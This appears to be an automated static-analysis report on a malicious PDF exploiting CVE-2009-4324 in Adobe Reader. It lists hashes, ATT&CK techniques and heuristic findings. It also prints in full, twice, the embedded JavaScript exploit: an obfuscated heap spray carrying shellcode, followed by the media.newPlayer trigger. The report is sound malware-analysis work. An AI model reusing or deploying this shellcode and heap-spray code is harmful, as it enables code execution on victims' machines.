Malicious PDF — malware analysis report

Static analysis result for SHA-256 439ac90a06153295…

MALICIOUS

PDF

1.17 MB Created: 2009-12-17 03:14:38 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows)) First seen: 2012-09-15
MD5: 05a9b5b9cb10f99dd1ed0f3b37abfba3 SHA-1: 9b29087ed4f1e8790b90e9f3d2d55752af822db6 SHA-256: 439ac90a0615329570b81dfe72e51067dc98cdebd447c3dc85463b39c0db35e6
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1204.002 Malicious File

The PDF file was flagged as malicious by an ML classifier and contains embedded JavaScript. The JavaScript stream, named 'javascript_obj0031_000.js', is likely responsible for the malicious behavior. While the specific actions of the script are not fully detailed, its presence within a high-confidence malicious PDF suggests it is designed to download and execute a second-stage payload or perform other harmful actions.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9984

Heuristics 9

  • media.newPlayer — CVE-2009-4324 critical CVE exact CVE_2009_4324
    PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
k1 pdf-embedded-file PDF EmbeddedFile object 26 at offset 0x1EC1 2041 bytes
SHA-256: d126f2ad4fc1902116e64aff7689cafa64a8efc447f950c255d916aa5935137f
javascript_obj0031_000.js pdf-javascript-stream PDF /JS object 31 at offset 0x12B202 3701 bytes
SHA-256: e9cb2449c93332aca5f571fb90f55fc92f7cf919152b2372665d6cd3a0c65799
Preview script
First 1,000 lines of the extracted script
var WeasdRTgfdTYhgfYujhgUIIjjh=unescape;
var UJNyhbTGVrfc =  WeasdRTgfdTYhgfYujhgUIIjjh("\x25\x753de9\x25\x750001%u5600%uc033%u8b64%u3040%u408b%u8b0c"+
"\x25\x751c70\x25\x758bad\x25\x750840\x25\x75c35e%u50ad%ue852%u000d%u0000"+
"%u0789%uc483%u8308%u04c7%uf13b%uec75%u60c3\x25\x756c8b"+
"%u2424%u458b%u8b3c%u2854%u0378%u8bd5\x25\x75184a%u5a8b"+
"%u0320%ue3dd%u4934%u348b%u038b%u33f5%u33ff%ufcc0"+
"%u84ac%u74c0%uc107%u0dcf%uf803%uf4eb%u7c3b%u2824"+
"%ue175%u5a8b%u0324%u66dd\x25\x750c8b%u8b4b%u1c5a%udd03"+
"%u048b%u038b%u89c5%u2444%u611c%uc7c3%u6445%u0000"+
"%u0000%u006a%u458d%u505c%u0068%u0004%uff00%u3c75"+
"%u75ff%uff48%u1855%uc933%u8b66%u5c4d%u7d8b%u8b3c"+
"%ub3f7%uacd8%uc332%ufeaa%ue2cb%u6af8%u8d00%u6045"+
"%uff50%u5c75%u558b%u523c%u75ff%uff4c%u1c55%u558b"+
"%u2960%u5855%u7d83%u0058%ub87f%u75ff%uff4c%u0855"+
"%u8ec3%u0e4e%u83ec%ub5b9%ufb78%ufd97%u330f%u8aca"+
"%u4f5b%uc703%ua5bf%u0017%u167c%ufa65%u1f10%u0a79"+
"%uace8%uda08%uad76%u7d9b%u98df%u8afe%uec0e%u0397"+
"%u000c%u0000%u0000%u0000%u0000%u0000%u0000%u0000"+
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"+
"%u0000%u0000%ubb00%ubbbb%u00bb%u0000%u0000%u0000"+
"%u0000%u0000%u0000%u0000%u7400%u6d65%u2e70%u7865"+
"%u0065%u00e8%u0000%u5d00%ued81%u0076%u0000%ub2e8"+
"%ufffe%u8bff%u8bd0%u8bf5%u8bfe%u83ce%u30c1%ub5e8"+
"%ufffe%u33ff%u89c9%u484d%u4583%u0448%uc933%uff51"+
"%u4875%u55ff%u3d24%ub600%u0012%uec72%u003d%u12ba"+
"%u7700%u68e5%u00ff%u0000%u406a%u55ff%u892c%u3845"+
"%u6850%u00ff%u0000%u55ff%u8b0c%u8bc8%u3845%uc103"+
"%ue883%uc605%u0000%u75ff%uff38%u1055%u006a%u006a"+
"%u0068%u001f%uff00%u4875%u55ff%u6a20%u8d00%u5c45"+
"%u6a50%u8d04%u5445%uff50%u4875%u55ff%u6a18%u6a00"+
"%u6800%u1f10%u0000%u75ff%uff48%u2055%u6a55%u6800"+
"%u0080%u0000%u026a%u006a%u016a%u0068%u0000%u8d40"+
"%u6845%u8350%u1445%ueb05%u8b0a%u8bf5%u55ff%uec8b"+
"%u66ff%ue814%ufff1%uffff%u835d%ufff8%u0275%u39eb"+
"%u4589%u684c%u0400%u0000%u406a%u55ff%u892c%u3c45"+
"%u458b%u8954%u5845%u50e8%ufffe%u55ff%uc933%u8d51"+
"%u6845%u8350%u2845%ueb05%u8b0a%u90f5%u5590%uec8b"+
"%u66ff%ue828%ufff1%uffff%u6a5d%u6a00%uffff\x25\x750455"+
"%u0000");
var yiojnhttewqwsxfguUJHTredDEEdfgGREWswqwASDGhHNJIIOoytFGV="QAAzweeRDFCfttyyHVBVJHjiKJJhgfFFvbhjJKIUytrfFGfdfg";
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = WeasdRTgfdTYhgfYujhgUIIjjh("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = WeasdRTgfdTYhgfYujhgUIIjjh("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 32768) QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
	QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,32768 - UJNyhbTGVrfc.length);
var EDVGYujmkoQAZxdr=Array;
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
for(i=0;i<0x2000;i++) {
	memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + UJNyhbTGVrfc;
}

util.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new Date());
util.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new Date());
try {this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}
util.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY, new Date());
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202 3461 bytes
SHA-256: dd81a6025f7788235f0ba96e734e15fa835b519be9bf117ccab816643f368b42
Detection
ClamAV: No threats found
Obfuscation or payload: likely
12 of 18 identifiers look randomly generated (e.g. 'QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkm') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var WeasdRTgfdTYhgfYujhgUIIjjh=unescape;
var UJNyhbTGVrfc =  WeasdRTgfdTYhgfYujhgUIIjjh("%u3de9%u0001%u5600%uc033%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0840%uc35e%u50ad%ue852%u000d%u0000%u0789%uc483%u8308%u04c7%uf13b%uec75%u60c3%u6c8b%u2424%u458b%u8b3c%u2854%u0378%u8bd5%u184a%u5a8b%u0320%ue3dd%u4934%u348b%u038b%u33f5%u33ff%ufcc0%u84ac%u74c0%uc107%u0dcf%uf803%uf4eb%u7c3b%u2824%ue175%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u89c5%u2444%u611c%uc7c3%u6445%u0000%u0000%u006a%u458d%u505c%u0068%u0004%uff00%u3c75%u75ff%uff48%u1855%uc933%u8b66%u5c4d%u7d8b%u8b3c%ub3f7%uacd8%uc332%ufeaa%ue2cb%u6af8%u8d00%u6045%uff50%u5c75%u558b%u523c%u75ff%uff4c%u1c55%u558b%u2960%u5855%u7d83%u0058%ub87f%u75ff%uff4c%u0855%u8ec3%u0e4e%u83ec%ub5b9%ufb78%ufd97%u330f%u8aca%u4f5b%uc703%ua5bf%u0017%u167c%ufa65%u1f10%u0a79%uace8%uda08%uad76%u7d9b%u98df%u8afe%uec0e%u0397%u000c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ubb00%ubbbb%u00bb%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u7400%u6d65%u2e70%u7865%u0065%u00e8%u0000%u5d00%ued81%u0076%u0000%ub2e8%ufffe%u8bff%u8bd0%u8bf5%u8bfe%u83ce%u30c1%ub5e8%ufffe%u33ff%u89c9%u484d%u4583%u0448%uc933%uff51%u4875%u55ff%u3d24%ub600%u0012%uec72%u003d%u12ba%u7700%u68e5%u00ff%u0000%u406a%u55ff%u892c%u3845%u6850%u00ff%u0000%u55ff%u8b0c%u8bc8%u3845%uc103%ue883%uc605%u0000%u75ff%uff38%u1055%u006a%u006a%u0068%u001f%uff00%u4875%u55ff%u6a20%u8d00%u5c45%u6a50%u8d04%u5445%uff50%u4875%u55ff%u6a18%u6a00%u6800%u1f10%u0000%u75ff%uff48%u2055%u6a55%u6800%u0080%u0000%u026a%u006a%u016a%u0068%u0000%u8d40%u6845%u8350%u1445%ueb05%u8b0a%u8bf5%u55ff%uec8b"+
"%u66ff%ue814%ufff1%uffff%u835d%ufff8%u0275%u39eb%u4589%u684c%u0400%u0000%u406a%u55ff%u892c%u3c45%u458b%u8954%u5845%u50e8%ufffe%u55ff%uc933%u8d51%u6845%u8350%u2845%ueb05%u8b0a%u90f5%u5590%uec8b%u66ff%ue828%ufff1%uffff%u6a5d%u6a00%uffff%u0455%u0000");
var yiojnhttewqwsxfguUJHTredDEEdfgGREWswqwASDGhHNJIIOoytFGV="QAAzweeRDFCfttyyHVBVJHjiKJJhgfFFvbhjJKIUytrfFGfdfg";
var QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh = WeasdRTgfdTYhgfYujhgUIIjjh("\x25\x750\x630\x63\x25\x750\x630\x63");
var QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY = WeasdRTgfdTYhgfYujhgUIIjjh("\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c\x25\x750c0c%u5a51%u4874%u5961%u6b71%u4772%u6a47%u4a73%u6247%u654b%u734b%u4858%u6371%u717a%u7672%u626e%u626e%u455a%u4243%u6764%u7646%u696b%u6a6e%u4e61%u6c6d%u7350%u5168%u7171%u5574");
while(QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.length <= 32768) QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh+=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh;
	QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh=QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh.substring(0,32768 - UJNyhbTGVrfc.length);
var EDVGYujmkoQAZxdr=Array;
memRDXCFTYGVbhu=new EDVGYujmkoQAZxdr();
var RYHJNBVCwssxcftyUIKKMNGr="WSSDCCGTYygvBHJUIikmnmM<KOPplkuYTFfeweSDDgghYUUh";
for(i=0;i<0x2000;i++) {
	memRDXCFTYGVbhu[i]= QWEasdERdfgTYUghjYUIhjkUIojklOiutytrtWErtyuuiASdfgh + UJNyhbTGVrfc;
}

util.printd("QAzwsxQWEedcERTertFCVCrtghVBbnuytTHN", new Date());
util.printd("BjEdcRFvtGBBjhuIJnOkmSsXDFtGByhUjFqR", new Date());
try {this.media["\x6e\x65\x77\x50\x6c\x61\x79\x65\x72"](null);} catch(e) {}
util.printd(QAZSWExxdrRFCfgtyTYGgvvBGHYUuhbbnJIIIOkmmPPllOKKIiJNhuyygVGTffcvFRRdfdDEedDDdDEedWWsxXZAQAqRffVGTY, new Date());

Open this report in the interactive analyzer, or submit your own file for analysis.